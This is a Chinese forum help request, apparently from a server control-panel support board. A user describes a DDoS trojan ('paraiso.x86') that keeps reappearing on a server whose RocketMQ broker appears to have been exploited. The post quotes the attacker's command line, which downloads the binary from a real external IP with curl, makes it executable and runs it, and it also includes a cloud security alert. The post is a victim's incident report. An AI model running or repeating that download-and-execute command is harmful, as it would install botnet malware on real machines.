本帖最后由 堡塔运维小林 于 2023-6-12 11:42 编辑
为了能快速了解并处理您的问题,请提供以下基础信息: 问题描述:创建恶意进程,kill paraiso相关进程后,就会在opt目录生成 paraiso1.x86 - 用户名 root
- 命令行 sh -c $@|sh . echo cd /opt/; curl -O http://152.70.143.251/bins/paraiso.x86; chmod 777 paraiso.x86; ./paraiso.x86 china;/bin/startfsrv.sh -n localhost:9876
- 进程ID 15545
- 父进程ID 8988
- 进程链
- -[8955] sh mqbroker -n localhost:9876 autoCreateTopicEnable=true
- -[8959] sh /usr/local/rocketmq-4.9.3/bin/runbroker.sh org.apache.rocketmq.broker.BrokerStartup -n localhost:9876 autoCreateTopicEnable=true
- -[8988] /bin/java -server -Xms256m -Xmx256m -Xmn128m -XX:+UseG1GC -XX:G1HeapRegixss=16m -XX:G1ReservePercent=25 -XX:InitiatingHeapOccupancyPercent=30 -XX:SoftRefLRUPolicyMSPerMB=0 -verbose:gc -Xloggc:/dev/shm/rmq_srv_gc_%p_%t.log -XX:+PrintGCDetails -XX:+PrintGCDateStamps -XX:+PrintGCApplicationStoppedTime -XX:+PrintAdaptiveSizePolicy -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=30m -XX:-OmitStackTraceInFastThrow -XX:+AlwaysPreTouch -XX:MaxDirectMemorySize=15g -XX:-UseLargePages -XX:-UseBiasedLocking -cp .:/usr/local/rocketmq-4.9.3/bin/../conf:/usr/local/rocketmq-4.9.3/bin/../lib/*: org.apache.rocketmq.broker.BrokerStartup -n localhost:9876 autoCreateTopicEnable=true
复制代码
- {
- "Status": "new",
- "InstanceName": "xxxxxxxx",
- "ResourceId": "xxxxxxxx",
- "Content": {
- "internet_ip": "1xxxxxxxx2",
- "op": "new",
- "instance_id": "i-xxxxxxxx",
- "level": "serious",
- "unique_info": "62af021c0f8f619dd19c2130dc5f0273",
- "last_time": 1686296315785,
- "event_name_display": "DDOS木马",
- "event_type_display": "恶意软件-DDoS木马",
- "machine_name": "laxxxxxxxx2",
- "intranet_ip": "17xxxxx4",
- "uuid": "32628079-e29d-424c-8723-a4e6f875573e",
- "status": 1
- },
- "Product": "sas",
- "Time": 1686296325000,
- "Level": "CRITICAL",
- "RegionId": "cn-hangzhou",
- "GroupId": "0",
- "Name": "Suspicious:MaliciousProcess:serious"
- }
复制代码
相关截图(日志、错误):
|
|